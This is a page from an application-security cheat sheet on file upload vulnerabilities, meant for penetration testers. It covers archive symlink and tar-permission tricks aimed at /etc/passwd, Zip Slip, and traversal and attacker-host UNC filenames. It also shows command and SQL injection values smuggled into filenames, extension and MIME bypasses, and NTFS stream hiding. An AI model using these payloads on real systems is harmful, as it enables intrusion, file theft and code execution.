💻
Application Security Cheat Sheet
  • Application Security Cheat Sheet
  • Android Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
      • Package Manager
    • Intent Vulnerabilities
      • Deep Linking Vulnerabilities
    • WebView Vulnerabilities
      • WebResourceResponse Vulnerabilities
      • WebSettings Vulnerabilities
  • CI/CD
    • Dependency
      • Dependency Confusion
      • Dependency Hijaking
      • Typosquatting
    • GitHub
      • GitHub Actions
      • Code owners
      • Dependabot
      • Redirect
      • Releases
  • Cloud
    • AWS
      • Amazon API Gateway
      • Amazon Cognito
      • Amazon S3
  • Container
    • Overview
      • Container Basics
      • Docker Engine
    • Escaping
      • CVE List
      • Exposed Docker Socket
      • Excessive Capabilities
      • Host Networking Driver
      • PID Namespace Sharing
      • Sensitive Mounts
    • Container Analysis Tools
  • Framework
    • Spring
      • Overview
      • Mass Assignment
      • Routing Abuse
      • SpEL Injection
      • Spring Boot Actuators
      • Spring Data Redis Insecure Deserialization
      • Spring View Manipulation
    • React
      • Overview
      • Security Issues
  • Linux
    • Overview
      • Philosophy
      • File
      • File Descriptor
      • I/O Redirection
      • Process
      • Inter Process Communication
      • Shell
      • Signals
      • Socket
      • User Space vs Kernel Space
    • Bash Tips
  • iOS Application
    • Overview
      • Application Data & Files
      • Application Package
      • Application Sandbox
      • Application Signing
      • Deployment
    • Getting Started
      • IPA Patching
      • Source Code Patching
      • Testing with Objection
  • Resources
    • Lists
      • Payloads
      • Wordlists
    • Researching
      • Web Application
      • Write-ups
    • Software
      • AWS Tools
      • Azure Tools
      • Component Analysis
      • Docker Analysis
      • Dynamic Analysis
      • Fuzzing
      • GCP Tools
      • Reverse Engineering
      • Static Analysis
      • Vulnerability Scanning
    • Training
      • Secure Development
  • Web Application
    • Abusing HTTP hop-by-hop Request Headers
    • Broken Authentication
      • Two-Factor Authentication Vulnerabilities
    • Command Injection
      • Argument Injection
    • Content Security Policy
    • Cookie Security
      • Cookie Bomb
      • Cookie Jar Overflow
      • Cookie Tossing
    • CORS Misconfiguration
    • File Upload Vulnerabilities
    • GraphQL Vulnerabilities
    • HTML Injection
      • base
      • iframe
      • link
      • meta
      • target attribute
    • HTTP Header Security
    • HTTP Request Smuggling
    • Improper Rate Limits
    • JavaScript Prototype Pollution
    • JSON Web Token Vulnerabilities
    • OAuth 2.0 Vulnerabilities
      • OpenID Connect Vulnerabilities
    • Race Condition
    • Server Side Request Forgery
      • Post Exploitation
    • SVG Abuse
    • Weak Random Generation
    • Web Cache Poisoning
Powered by GitBook
On this page
  • Abuse archives
  • Abusing symlinks
  • Abusing tar permissions
  • Zip Slip
  • Abuse filename
  • Path as filename
  • Injections via filename
  • SSRF via filename
  • DoS via large filename
  • Bypass restrictions
  • Content-Type
  • Magic bytes
  • Extension
  • Invalid regex
  • Windows dots
  • Windows ADS
  • Third-party vulnerabilities
  • Vulnerabilities in image processors
  • FFmpeg
  • ExifTool
  • Configuration files
  • Potentially dangerous files
  • ASP
  • Adobe ColdFusion
  • JSP
  • Perl
  • SVG
  • XML
  • Race condition
  • File upload race condition
  • URL-based file upload race condition
  • SSRF via HTTP range requests
  • References
  1. Web Application

File Upload Vulnerabilities

PreviousCORS MisconfigurationNextGraphQL Vulnerabilities

Last updated 2 years ago

Abuse archives

There are weaknesses that exist when a file upload functionality accepts and extracts archives without proper security measures in place.

Abusing symlinks

tar and zip allow you to include symlinks in tarballs/archives they generated. If an application does not properly validate the content of the archives, it can lead to arbitrary reading/writing of files.

References:

Abusing tar permissions

If an application uses Unix tar command to extract .tar files, removes symlinks and accesses subdirectory directly, you can try to bypass the symlink removing process with tar permissions. Unix tar command preserves the unix permissions assigned to it while creating the archive. If you create a parent directory which no one have read permissions (set chmod to 300) while creating the subdirectory with the complete permissions (set the chmod to 700), you can include symlinks inside the subdirectory that will not be found during the symlink removing process, but will be found when accessing directly since the subdirectory has read permissions.

$ mkdir parent
$ cd parent
$ tar cf a.tar . --mode=300
$ mkdir sub
$ cd sub
$ ln -s /etc/passwd file.txt
$ cd ..
$ tar -rf a.tar sub

Zip Slip

The Zip Slip takes advantage of zips that may contain files with specifically placed payloads set to the names, that once extracted, lead to a path traversal, and can write any file to any directory the webserver has access to. It can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.

Abuse filename

Path as filename

Try to use different kinds of path as a filename:

  • Absolute path, for example filename=/etc/passwd

  • Relative path, for example filename=../../../../../../etc/passwd

  • UNC path, for example filename=\\attacker-website.com\file.png

Injections via filename

Try to exploit command injection or sqli via filename, for example a$(whoami)z.png, a`whoami`z.png or a';select+sleep(10);--z.png

SSRF via filename

Try to send URL as filename to get blind SSRF, for example filename=https://172.17.0.1/internal/file. You can also try to change type="file" to type="url" within a request.

DoS via large filename

Try to upload a file with large name, sometimes it leads to DoS.

References:

Bypass restrictions

Content-Type

Try to change a Content-Type value:

  • Allowed MIME-type + disallowed extension

  • Disallowed MIME-type + allowed extension

  • Remove Content-Type

  • Send Content-Type twice within request with allowed and disallowed MIME-types

Magic bytes

If an application use a file's magic bytes to deduce the Content-type, you can try to bypass security measures by forging the magic bytes of an allowed file. For example, if GIF images are allowed, you can forge a GIF image's magic bytes GIF89a to make the server think we are sending it a valid GIF.

References:

Extension

Try to change a file extension:

  • Less-common extension, such as .phtml

  • Double extension, such as .jpg.svg or .svg.jpg

  • Extension with a delimeter, such as %0a, %09, %0d, %00, #, etc. For example, file.png%00.svg or file.png\x0d\x0a.svg

  • Empty extension, for example file.

  • Extension with varied capitalization, such as .sVG

  • Try to cut allowed extension with max filename length.

  • Empty filename, for example .svg

  • Send filename twice within request with allowed and disallowed extensions, for example filename="file.png";filename="file.svg"

Invalid regex

Windows dots

Within Windows, when a file is created with a trailing full-stop, the file is saved without said trailing character, leading to potential blacklist bypasses on Windows file uploads.

For example, if an application is rejecting files that end in .aspx, you can upload a file called shell.aspx.. Now this filename will bypass the blacklist, as .aspx != .aspx., but upon saving the file to the server, Windows will cut out the trailing ., leaving shell.aspx.

Windows ADS

An Alternate Data Stream (ADS) is a little-known feature of the NTFS file system. It has the ability of forking data into an existing file without changing its file size or functionality. In other words, ADS allows you to hide a file inside another one.

The following example hides copy of calc.exe inside file.txt:

C:> echo Somedata > file.txt
C:> type file.txt
Somedata
C:> type c:\windows\system32\calc.exe > file.txt:calc.exe

To start the hidden calc.exe copy, you can run the following command:

C:> start c:\file.txt:calc.exe

References:

Third-party vulnerabilities

Vulnerabilities in image processors

Resources:

  • Zeronights 2021: Emil Lerner – HotPics

FFmpeg

ExifTool

ExifTool versions 7.44 through 12.23 inclusive are vulnerable to a local command execution vulnerability when processing djvu files. If an application is accepting uploaded files, which are passed to ExifTool, it can lead to RCE.

References:

Configuration files

Some servers/frameworks work with configuration files at runtime to define various settings and restrictions. The most famous examples are the the Apache httpd/Tomcat .htaccess and the ASP.NET/IIS web.config files. You can check your server/framework and try to upload particular config to bypass some security measures or even execute code.

References:

Potentially dangerous files

ASP

Try to upload on an IIS server files with the asp, ashx, asmx, asa, aspx, cer or xamlx extensions to get RCE.

References:

Adobe ColdFusion

Try to upload ColdFusion files with the cfm, cfml, cfc or dbm extensions to get RCE.

Adobe ColdFusion SSRF

JSP

Try to upload JSP files with the jsp, jspx, jsw, jsv, or jspf extensions to get RCE.

Perl

Try to upload perl files with the pl, pm, cgi, or lib extensions to get RCE.

SVG

XML

Try to upload valid XML file with external entities to get XXE.

References:

Race condition

File upload race condition

If an application uploads a file directly to a target folder before the file passes validation, you can abuse this behavior by using race condition.

Suppose file upload has the following flow:

  1. Upload file to a target folder

  2. Validate file

  3. If the validation fails, remove the file. Otherwise, send the link to a user

You can use race condition to fetch the file between steps 1 and 3 while the validation is in progress.

References:

URL-based file upload race condition

If an application allows users to upload a file by providing a URL and fetches the file for validation to a user-accessible folder, you can abuse this behavior by using race condition.

Suppose file upload has the following flow:

  1. Receive the URL from a user

  2. Create a local copy for validation within a user-accessible folder

  3. Validate file

  4. If the validation fails, reject the URL. Otherwise, send the link to a user

You can use race condition to fetch the file between steps 2 and 4 while the validation is in progress.

References:

SSRF via HTTP range requests

References:

References

Right-to-left override, for example file.%E2%80%AEphp.jpg, see

If an application download a file from a user-provided link with you can try to redirect the request one of the chunks to an internal server.

Report: Read files on application server, leads to RCE
Report: profile-picture name parameter with large value lead to DoS for other users and programs on the platform
Full list of known file magic bytes
Report: RTL override symbol not stripped from file names
CVE-2018-14364: How did I find a bug in Gitlab project import and got shell access
NTFS ALTERNATE DATA STREAMS: THE GOOD AND THE BAD
Video
Slides
Report: RCE when removing metadata with ExifTool
Writeup: ExifTool CVE-2021-22204 - Arbitrary Code Execution
Writeup: Bypass file upload filter with .htaccess
HTSHELLS - Self contained web shells and other attacks via .htaccess files
Upload a web.config File for Fun & Profit
PayloadsAllTheThings: Examples of insecure ASP files
Report: Uploaded XLF files result in External Entity Execution
Report: XXE at ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx
Writeup: My first XML External Entity (XXE) attack with .gpx file
Web Security Academy: File upload vulnerabilities - Exploiting file upload race conditions
Web Security Academy: File upload vulnerabilities - Race conditions in URL-based file uploads
HTTP range requests
Writeup: Vimeo upload function SSRF
Zip Slip Vulnerability
SecurityTips: File upload bugs
File Upload Vulnerability Tricks And Checklist
Slides: File Upload by @0xAwali
LogoReading local files by abusing tar permissions in Gitlab Imports (Possibly leading to RCE) (#55501) · Issues · GitLab.org / GitLab FOSSGitLab
LogoGitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilitiesGitHub
LogoGitHub - snyk/zip-slip-vulnerability: Zip Slip Vulnerability (Arbitrary file write through archive extraction)GitHub
LogoGitHub - barrracud4/image-upload-exploits: This repository contains various media files for known attacks on web applications processing media files. Useful for penetration tests and bug bounty.GitHub
LogoServer Side Request Forgerycheat-sheets
LogoServer Side Request Forgerycheat-sheets
LogoSVG Abusecheat-sheets
LogoRace Conditioncheat-sheets